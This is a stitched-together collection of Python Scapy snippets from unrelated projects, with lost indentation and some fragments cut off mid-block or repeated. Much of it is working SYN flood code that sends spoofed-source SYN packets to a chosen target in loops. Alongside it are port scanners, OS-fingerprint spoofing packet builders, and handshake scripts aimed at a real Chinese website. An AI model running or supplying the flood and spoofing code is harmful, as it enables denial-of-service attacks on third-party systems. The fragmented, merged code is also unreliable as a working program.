def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def ecn_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['ECN']['TTL'], 16)
ip_flag = fp.probe['ECN']['DF']
if ip_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0
ip.id = fp.ip_id_gen()
tcp = TCP()
w_val = fp.probe['ECN']['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
cc_val = fp.probe['ECN']['CC']
if cc_val == 'Y':
tcp.flags = 0x52
elif cc_val == 'N':
tcp.flags = 0x12
elif cc_val == 'S':
tcp.flags = 0xD2
else:
tcp.flags = 0x10
o_val = fp.probe['ECN']['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def run(self):
# Damn, ugly!
global forging
if forging:
i = IP()
i.dst = ip
if spoofing:
i.src = '.'.join(
random.randint(1, 254) for _ in range(4))
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
try:
send(i / t, verbose=0)
except PermissionError:
print('ohno, not forging')
forging = False
else:
s = socket.socket()
s.connect((self.ip, self.port))
def doSynFlood(origin_ip=None, origin_port=None,
target_ip=None, target_port=None,
interface=None, duration=None, gap=0):
'''
Starts Syn Flood attacks
Arguments:
origin_ip (str): attacker ip
origin_port (int): attacker port
target_ip (str): target ip
target_port (int): target port
interface (str): network interface to use
duration (int): duration of the attack
gap (int): gap (delay) between packets
Returns:
None
'''
# Check if everything is filled out
if target_ip is None:
return
if target_port is None:
return
if duration is None:
return
if gap >= duration:
return
# Prepare the packet
ip_layer = IP()
ip_layer.src = origin_ip
ip_layer.dst = target_ip
tcp_layer = TCP()
tcp_layer.sport = origin_port
tcp_layer.dport = target_port
tcp_layer.flags = "S"
# Prepare timings
time_start = time()
time_end = time_start + duration
# Start attack
while (time() <= time_end): #duration
# Constantly changing values
tcp_layer.seq = GenerateRandomSafeSeq()
tcp_layer.ack = GenerateRandomSafeSeq()
tcp_layer.window = GenerateRandomWindow()
attack_packet = ip_layer/tcp_layer # packet to send
send(attack_packet, iface=interface)
if gap > 0:
sleep(gap) #gap
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def configureTCPPacket(port):
TCP_Packet = TCP()
TCP_Packet.dport = port
TCP_Packet.flags = "S" # SYN
TCP_Packet.seq = getRand()
TCP_Packet.sport = getRand()
TCP_Packet.window = getRand()
return TCP_Packet
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = self.port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.dport = self.port
t.flags = 'S'
print "Spoofing %s to send SYN ..." % i.src
sr1(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i/t, verbose=0)
def main():
os.system("sudo iptables -F")
# This one drops all (anywhere source and destination)
#os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP")
# Drop all from source localhost
os.system(
"sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP"
)
# Drop all from source 10.0.2.15 that is my IP address (ifconfig)
os.system(
"sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP"
)
os.system("sudo iptables -L")
# This is required for traffic to localhost
conf.L3socket = L3RawSocket
my_ip = IP(dst="www.baiwanzhan.com")
my_tcp = TCP(dport=80)
syn = my_ip / my_tcp
syn_ack = sr1(syn) # client send SYN and receive SYN/ACK
my_tcp = TCP(dport=80,
sport=syn_ack[TCP].dport,
seq=syn_ack[TCP].ack,
ack=syn_ack[TCP].seq + 1,
flags='A')
send(my_ip / my_tcp) # send ACK to complete the 3-way TCP handshake
my_tcp.flags = 'AP'
#my_tcp.show()
#get_str = "GET /service/site/search.aspx?query=法"
get_str = "GET /service/site/search.aspx?query=wa"
request = my_ip / my_tcp / get_str
reply = sr1(request)
print get_str
#get_str = "轮 HTTP/1.1\r\n" \
get_str = "ter HTTP/1.1\r\n" \
"Host: www.baiwanzhan.com\r\n\r\n"
my_tcp = TCP(dport=80,
sport=reply[TCP].dport,
seq=reply[TCP].ack,
ack=reply[TCP].seq + 1,
flags='AP')
request = my_ip / my_tcp / get_str
reply = sr1(request)
#send(request)
print get_str
def _send(self, **kwargs):
"""Every packet we send should go through here."""
load = kwargs.pop('load', None)
flags = kwargs.pop('flags', "")
packet = TCP(dport=self.dest_port,
sport=self.src_port,
seq=self.seq,
ack=self.last_ack_sent,
**kwargs)
# Always ACK unless it's the first packet
if self.state == "CLOSED":
packet.flags = flags
else:
packet.flags = flags + "A"
# Add the IP header
full_packet = self.ip_header / packet
# Add the payload
full_packet.load = load
# Send the packet over the wire
self.listener.send(full_packet)
# Update the sequence number with the number of bytes sent
if load is not None:
self.seq += len(load)
def run(self):
packet_ip = IP()
packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254))
packet_ip.dst = self.host
packet_tcp = TCP()
packet_tcp.sport = random.randint(1024, 65535)
packet_tcp.dport = self.port
packet_tcp.flags = 'S'
send(packet_ip/packet_tcp)
def main():
os.system("sudo iptables -F")
# This one drops all (anywhere source and destination)
#os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP")
# Drop all from source localhost
os.system(
"sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP"
)
# Drop all from source 10.0.2.15 that is my IP address (ifconfig)
os.system(
"sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP"
)
os.system("sudo iptables -L")
# This is required for traffic to localhost
conf.L3socket = L3RawSocket
my_ip = IP(dst="www.baiwanzhan.com")
#my_ip = IP(dst="www.google.com")
my_tcp = TCP(dport=80)
syn = my_ip / my_tcp
syn_ack = sr1(syn) # client send SYN and receive SYN/ACK
my_tcp = TCP(dport=80,
sport=syn_ack[TCP].dport,
seq=syn_ack[TCP].ack,
ack=syn_ack[TCP].seq + 1,
flags='A')
send(my_ip / my_tcp) # send ACK to complete the 3-way TCP handshake
my_tcp.flags = 'AP'
#my_tcp.show()
#get_str = "GET / HTTP/1.1\r\nHost: www.google.com \r\n\r\n"
#get_str = "GET /service/site/search.aspx?query=法轮 HTTP/1.1\r\n" \
get_str = "GET /service/site/search.aspx?query=方法 HTTP/1.1\r\n" \
"Host: www.baiwanzhan.com\r\n" \
"\r\n"
# "User-Agent: Python-Scapy\r\n" \
# "Accept:*/*\r\n" \
# "Connection: keep-alive\r\n" \
print get_str
request = my_ip / my_tcp / get_str
#send(request)
ans, unans = sr(request)
ans.summary()
unans.summary()
def sendSYN(host, port):
# Create an IP Packet using random ip as source and the target IP as destination
ipPacket = IP()
ipPacket.src = ".".join(
map(str, (random.randint(0, 255) for i in range(4))))
ipPacket.dst = host
# Create a TCP segment using a random source port and the target port as the destination
tcpSegment = TCP()
tcpSegment.sport = random.randint(1000, 65535)
tcpSegment.dport = port
# Set the syn flag
tcpSegment.flags = 'S'
# Send the composition of the two (package/segment) and ignore the result
send(ipPacket / tcpSegment, verbose=0)
pass
def is_port_open(ip_addr, port, timeout=5, verbose=False):
ip = IP()
ip.dst = ip_addr
syn = TCP()
syn.sport = choice(range(1000, 50000))
syn.dport = port
syn.flags = 'S'
syn.seq = 1
packet = ip/syn
synack = sr1(packet, timeout=timeout, verbose=verbose)
if synack and synack.sprintf('%TCP.flags%') == 'SA':
return True
return False
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
else:
print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def syn_flood(ip_destination, port_destination, limit):
total = 0
print("Enviando Pacotes")
for x in range(0, limit):
ip_packet = IP()
ip_packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
ip_packet.dst = ip_destination
tcp_packet = TCP()
tcp_packet.sport = random.randint(1000, 9000)
tcp_packet.dport = port_destination
tcp_packet.flags = "S"
tcp_packet.seq = random.randint(1000, 9000)
tcp_packet.window = random.randint(1000, 9000)
print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
send(ip_packet / tcp_packet, verbose=0)
total += 1
print("All packets sent")
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("[+] SYN packet sent!")
def server_tcp(self, flags, payload=b"", count=True):
data_length = max(len(payload), 1)
tcp = TCP()
tcp.flags = flags
tcp.sport = self.service
tcp.dport = self.client_port
tcp.seq = self.ss
tcp.ack = self.sa
if count:
self.ss += data_length
self.ca += data_length
packet = Ether(src=self.server.mac, dst=self.client.mac)
packet /= IP(src=self.server.ip, dst=self.client.ip)
packet /= tcp
if len(payload) > 0:
packet /= payload
self.packets.append(packet)
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(f"[{red} bold][✘] ERROR[/{red} bold] " +
f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
else:
print(f"[{green}][✔] SUCCESS[/{green}] " +
f"[{yellow}]SYN packet sent to[{yellow}] " +
f"[{blue}]{'{}:{}'.format(*target)}")
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
)
else:
print(
f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
)
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print 'Trying port %d' % port
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
if rcv_pkt:
break
# check to see if host responded, quit if otherwise
if not rcv_pkt:
# BT Port Scanner - Exercise 6.19 Solution
from scapy.all import sr1, IP, TCP
print "[BT PORT SCANNER]\n"
dest = raw_input("Enter destination IP address: ")
for i in range(20, 1025):
tcp_seg = TCP(dport=i, sport=2057, flags='S')
tcp_packet = IP(dst=dest)/tcp_seg
tcp_res = sr1(tcp_packet, timeout=1, verbose=0)
if str(type(tcp_res)) == "<type 'NoneType'>":
print "[" + str(i) + "] => CLOSED\n"
elif tcp_res.haslayer(TCP):
if tcp_res.getlayer(TCP).flags == 18:
tcp_seg.flags = 'A'
tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1
tcp_packet = IP(dst=dest)/tcp_seg
tcp_res = sr1(tcp_packet, timeout=1, verbose=0)
print "[" + str(i) + "] => OPEN\n"
else:
print "[" + str(i) + "] => CLOSED\n"
#!/usr/bin/python
from scapy.all import IP, TCP
a = IP()
a.src = "1.2.3.4"
a.dst = "10.0.2.15"
a.ihl = 5
b = TCP()
b.sport = 1551
b.dport = 23
b.seq = 1551
b.flags = 'S'
pkt = a/b
with open("packet", "wb") as f:
f.write(bytes(pkt))
def t2tot7_craft(pkt, fp, mac, tno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe[tno]['TTL'], 16)
ip.flags = fp.probe[tno]['DF']
ip.id = random.randint(1, 1000)
tcp = TCP()
s_val = fp.probe[tno]['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = pkt[TCP].ack + 369
a_val = fp.probe[tno]['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe[tno]['F']
tcp.flags = flag_val
w_val = fp.probe[tno]['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
o_val = fp.probe[tno]['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
rd_val = fp.probe[tno]['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
# TCP SYN
if sys.argv[1] == "-t":
print "TCP SYN scan on host " + sys.argv[2] + "\n"
ip = IP()
tcp = TCP()
# cast as str and int to avoid issues caused by periods
ip.dst = str(sys.argv[2])
# loop iterates through as many commandline arguments were given
for port in range(len(sys.argv) - 3):
print "Scanning port " + str(sys.argv[port + 3])
# port+3 is start of ports
tcp.dport = int(sys.argv[port + 3])
# send SYN packet
tcp.flags = "S"
packet = (ip / tcp)
# verbose=0 to limit console output; timeout 1s
status = sr1(packet, verbose=0, timeout=1)
if status:
print str(packet.dport) + " is open\n"
# UDP
elif sys.argv[1] == "-u":
print "UDP scan on host " + sys.argv[2] + "\n"
ip = IP()
udp = UDP()
# cast as str and int to avoid issues caused by periods
ip.dst = str(sys.argv[2])
# loop iterates through as many commandline arguments were given
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print('Trying port %d' % port)
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
if rcv_pkt:
break
# check to see if host responded, quit if otherwise
if not rcv_pkt:
def create_packet(packet_proto=PacketProto.TCP, **kwargs):
"""Creates network packet of IP and associated TCP or UDP corresponding packets via Scapy
:param: packet_proto denotes IP packet layer (protocol) to create, ex: TCP, UDP, ICMP
:type: PacketProto
:param: flags TCP flags to enabel in packet, ex: 'AFS'
:type: str
:param: kwargs dictionary for packet creation
src = IP address of source
sport = IP source port
dst = IP address of destination
dport = IP destination port
src_mac = Ethernet MAC address of source
:rtype: dict
:return: scapy packet
:rtype: pkt
:raise: ValidationError if method parameter validation fails
"""
errors = {}
if 'flags' in kwargs and not valid_flags(kwargs.get('flags')):
errors["tcp_flags"] = "Invalid TCP flag(s): " + kwargs.get('flags')
if 'flags' in kwargs and packet_proto != PacketProto.TCP:
errors["flags"] = "Invalid flags cannot be passed non TCP packet"
if 'dport' in kwargs and not valid_port(kwargs.get("dport")):
errors["dport"] = "Invalid destination port " + str(
kwargs.get("dport"))
if 'sport' in kwargs and not valid_port(kwargs.get("sport")):
errors["sport"] = "Invalid source port " + str(kwargs.get("sport"))
if 'src' in kwargs and not valid_ip(kwargs.get("src")):
errors["src"] = "Invalid source IP address " + kwargs.get("src")
if 'dst' in kwargs and not valid_ip(kwargs.get("dst")):
errors["dst"] = "Invalid destination IP address " + kwargs.get("dst")
if 'src_mac' in kwargs and not valid_mac(kwargs.get("src_mac")):
errors["src_mac"] = "Invalid source MAC address " + kwargs.get(
"src_mac")
if 'dst' not in kwargs:
errors["dst"] = "Destination IP address required"
if packet_proto == PacketProto.TCP and 'dport' not in kwargs:
errors["tcp_dport"] = "Destination port required for TCP packet"
if errors:
raise ValidationError("Invalid IP creation", errors)
# create scapy packet
# pylint: disable=invalid-name
ip = IP(dst=kwargs.get("dst"))
if 'src' in kwargs:
ip.src = kwargs.get("src")
LOGGER.debug("Set Src IP " + ip.src)
if packet_proto == PacketProto.TCP:
tcp = TCP(dport=int(kwargs.get("dport")))
if 'sport' in kwargs:
tcp.sport = int(kwargs.get("sport"))
tcp.flags = kwargs.get("flags")
LOGGER.debug("Set TCP Flags " + str(tcp.flags))
packet = ip / tcp
elif packet_proto == PacketProto.UDP:
udp = UDP(dport=int(kwargs.get("dport")))
LOGGER.debug("Set UDP Dest Port " + str(udp.dport))
if 'sport' in kwargs:
udp.sport = int(kwargs.get("sport"))
LOGGER.debug("Set UDP Src Port " + str(udp.sport))
packet = ip / udp
elif packet_proto == PacketProto.ICMP:
LOGGER.debug("Set ICMP packet")
icmp = ICMP()
packet = ip / icmp
else:
errors[
"packet_proto"] = "Invalid packet protocol passed (unrecognized)"
raise ValidationError("Invalid IP creation", errors)
if 'src_mac' in kwargs:
ether = Ether(src=kwargs.get("src_mac"))
LOGGER.debug("Set Ethernet MAC Addr " + ether.src)
packet = ether / packet
LOGGER.debug(packet.show())
return packet
# BT Port Scanner - Exercise 6.19 Solution
from scapy.all import sr1, IP, TCP
print "[BT PORT SCANNER]\n"
dest = raw_input("Enter destination IP address: ")
for i in range(20, 1025):
tcp_seg = TCP(dport=i, sport=2057, flags='S')
tcp_packet = IP(dst=dest) / tcp_seg
tcp_res = sr1(tcp_packet, timeout=1, verbose=0)
if str(type(tcp_res)) == "<type 'NoneType'>":
print "[" + str(i) + "] => CLOSED\n"
elif tcp_res.haslayer(TCP):
if tcp_res.getlayer(TCP).flags == 18:
tcp_seg.flags = 'A'
tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1
tcp_packet = IP(dst=dest) / tcp_seg
tcp_res = sr1(tcp_packet, timeout=1, verbose=0)
print "[" + str(i) + "] => OPEN\n"
else:
print "[" + str(i) + "] => CLOSED\n"
